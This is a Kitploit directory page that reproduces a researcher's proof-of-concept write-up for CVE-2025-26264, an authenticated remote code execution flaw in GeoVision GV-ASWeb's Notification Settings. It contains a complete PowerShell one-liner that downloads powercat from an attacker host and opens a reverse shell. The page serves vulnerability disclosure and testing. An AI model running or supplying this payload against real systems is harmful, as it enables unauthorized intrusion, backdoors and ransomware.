Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-26264 — CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise. | Kitploit
Tools/GitHubGitHub/hxlxmj/cve-2025-26264
Vulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPenetration TestingRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

View Repository
151 year agoNot yet reviewed
Website

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →

About

CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.

Share

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.

Requirements

To perform successful attack an attacker requires:

  • Network access to the GV-ASManager web application with version 6.1.2.0 or less;
  • Access to an account with privilege of managing Notification Settings feature.

Impact

The vulnerability can be leveraged to perform the following unauthorized actions:

  • An account with privilege of managing Notification Settings feature is able to:
    • Perform Remote Code Execution attack.
  • After the successfull attack, an attacker will be able to:
    • Access, modify, or delete sensitive system information;
    • Plant a system backdoor;
    • Perform ransomware attack;
    • Perform lateral movement in the internal network.

CVE-2025-26264 PoC [Testing GeoVision v6.1.2.0]

Exploiting Remote Code Execution vulnerability in GeoVision GV-ASManager's ASWeb platform is possible against versions 6.1.2.0 or less (there is no fix as of 26 February 2025).

GeoVision ASManager's ASWeb function Notification Setting is vulnerable to RCE

HTTP request of setting up a notification on a specific event: Failed TAWeb login attempt

According to this script, If there is a failed TAWeb login attempt, the following PowerShell script will be executed:

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

A failed attempt of authentication in TAWeb

Victim's host: The script opens a backdoor to the attacker's host.

Attacker's host: An attacker gets the shell

Contact

If you have a question, you can contact me, Giorgi Dograshvili on LinkedIn.

Download Tool